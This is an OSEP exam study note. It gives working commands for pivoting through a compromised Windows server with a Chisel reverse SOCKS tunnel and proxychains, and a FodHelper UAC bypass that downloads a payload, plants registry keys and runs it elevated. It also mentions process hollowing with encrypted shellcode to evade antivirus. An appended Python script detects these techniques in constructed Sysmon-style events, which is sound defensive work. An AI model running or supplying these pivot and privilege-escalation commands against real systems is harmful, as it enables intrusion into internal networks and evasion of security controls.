OSEP Additional Note

1. The document describes how to use Chisel to pivot through a victim server to gain access to an internal network. It provides commands to set up a Chisel server on Kali and connect a Chisel client on the victim machine to tunnel traffic through. 2. It also outlines how to use FodHelper to bypass UAC and execute a Meterpreter payload on the victim. It provides steps to download the payload, configure the registry to trigger it, and run FodHelper to gain elevated privileges. 3. Additional payloads may need to be generated using techniques like process hollowing and encrypted shellcode to evade antivirus detection on the victim.

Uploaded by: Hoàng Trong
1. Pivot with Chisel


Upload chisel/[Link] from Kali to c:\windows\tasks on the victim server.
Check your proxychains config on Kali at /etc/[Link]. It must define the port that proxychains will use as its SOCKS proxy.

On my Kali, I configured proxychains to use port 1080 as the proxy server listener port.
On your Kali, run the following command to start a Chisel server:

    ./chisel server -p 8080 --socks5 --reverse

This starts a Chisel server listening on port 8080. --socks5 enables the built-in SOCKS5 proxy and --reverse allows the client to request a reverse port forward; that reverse forward is what opens the SOCKS listener on the Kali side, and its port must match the one in your proxychains config (1080 here).
On the victim, run a Chisel client that connects back to the Chisel server on Kali and asks for the reverse SOCKS forward:

    .\[Link] client -v [Link]:8080 R:1080:socks

Both chisel and [Link] are the same tool and take the same arguments as above; only the binary name differs between the Linux and Windows builds.

If it succeeds, the Chisel server on Kali prints a Listening line:

→ After that, you can use proxychains to run any command from your Kali directly against the internal network:

    proxychains4 ssh [Link]@[Link]
    proxychains mongo "mongodb://[Link]/internal_service"
    proxychains python3 /usr/share/doc/python3-impacket/examples/[Link] username:passwd@[Link]

2. FodHelper bypass UAC


You must run [Link] from a 64-bit shell. Check the shell with: [Environment]::Is64BitProcess

    # Put the payload in C:\[Link]
    Invoke-WebRequest -Uri [Link] -Outfile c:\windows\tasks\[Link];

    # Configure the exploit
    New-Item "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Force
    New-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "DelegateExecute" -Value "" -Force
    Set-ItemProperty -Path "HKCU:\Software\Classes\ms-settings\Shell\Open\command" -Name "(default)" -Value "C:\\windows\\tasks\\[Link]" -Force

    # Run it! And FodHelper will execute our c:\windows\tasks\[Link]
    C:\Windows\System32\[Link]

Sometimes you need to build your [Link] with process hollowing plus encrypted shellcode for AV evasion.
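As an added example covering both sections above (it is not part of the original note), the following Python script shows what a defender would look for once these two techniques are in play: a Sysmon-style event stream is scanned for writes to the ms-settings\Shell\Open\command key under the user hive, for processes spawned by fodhelper.exe, and for a Chisel client command line that requests a reverse SOCKS forward (R:<port>:socks). The event records, the SID, the payload file name and the 192.0.2.10 server address are all constructed for this example; the field names follow Sysmon's ProcessCreate (EventID 1) and RegistryEvent value-set (EventID 13) schema.

```python
import re
from typing import Dict, Iterable, List

# Hive-agnostic pattern for the key fodhelper.exe consults. Sysmon records
# HKCU writes as HKU\<SID>\..., so match on the Software\Classes suffix.
MS_SETTINGS_COMMAND_KEY = re.compile(
    r"\\software\\classes\\ms-settings\\shell\\open\\command(\\|$)",
    re.IGNORECASE,
)

# Chisel client syntax for a reverse SOCKS forward, as used in the note:
# "client <server:port> R:<local-port>:socks".
CHISEL_REVERSE_SOCKS = re.compile(r"\bclient\b.*\bR:\d{1,5}:socks\b", re.IGNORECASE)


def analyze_events(events: Iterable[Dict]) -> List[Dict]:
    """Scan Sysmon-style events and return one finding per matching rule, in input order."""
    findings: List[Dict] = []
    for ev in events:
        eid = ev.get("EventID")
        if eid == 13:  # RegistryEvent (Value Set)
            target = ev.get("TargetObject") or ""
            if MS_SETTINGS_COMMAND_KEY.search(target):
                findings.append({
                    "rule": "fodhelper_registry_write",
                    "image": ev.get("Image"),
                    "target": target,
                    "details": ev.get("Details"),
                })
        elif eid == 1:  # ProcessCreate
            parent = (ev.get("ParentImage") or "").lower()
            cmd = ev.get("CommandLine") or ""
            # fodhelper.exe auto-elevates; a child process it spawns is the
            # bypass firing, so report it together with its integrity level.
            if parent.endswith("\\fodhelper.exe"):
                findings.append({
                    "rule": "fodhelper_child_process",
                    "image": ev.get("Image"),
                    "integrity": ev.get("IntegrityLevel"),
                })
            if CHISEL_REVERSE_SOCKS.search(cmd):
                findings.append({
                    "rule": "chisel_reverse_socks",
                    "image": ev.get("Image"),
                    "command_line": cmd,
                })
    return findings


# Constructed sample events (not real telemetry). The SID, file names and
# the 192.0.2.10 address are placeholders.
SAMPLE_EVENTS = [
    {   # benign registry write elsewhere in the user hive
        "EventID": 13,
        "Image": r"C:\Windows\explorer.exe",
        "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden",
        "Details": "DWORD (0x00000001)",
    },
    {   # the DelegateExecute value from the FodHelper steps above
        "EventID": 13,
        "Image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "TargetObject": r"HKU\S-1-5-21-1-2-3-1001\Software\Classes\ms-settings\Shell\Open\command\DelegateExecute",
        "Details": "(Empty)",
    },
    {   # payload launched by the auto-elevated fodhelper.exe
        "EventID": 1,
        "Image": r"C:\Windows\Tasks\payload.exe",
        "CommandLine": r"C:\windows\tasks\payload.exe",
        "ParentImage": r"C:\Windows\System32\fodhelper.exe",
        "IntegrityLevel": "High",
    },
    {   # benign process
        "EventID": 1,
        "Image": r"C:\Windows\System32\notepad.exe",
        "CommandLine": "notepad.exe notes.txt",
        "ParentImage": r"C:\Windows\explorer.exe",
        "IntegrityLevel": "Medium",
    },
    {   # chisel client requesting a reverse SOCKS forward
        "EventID": 1,
        "Image": r"C:\Windows\Tasks\chisel.exe",
        "CommandLine": r".\chisel.exe client -v 192.0.2.10:8080 R:1080:socks",
        "ParentImage": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
        "IntegrityLevel": "Medium",
    },
]


if __name__ == "__main__":
    for finding in analyze_events(SAMPLE_EVENTS):
        print(finding["rule"], finding)
```

Run against the constructed events it reports three findings (the registry write, the High-integrity child of fodhelper.exe, and the chisel reverse SOCKS command line) and nothing for the two benign records. The registry rule matches on the key path alone rather than on the process that wrote it, because no legitimate software populates that key, so the write itself is the signal.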
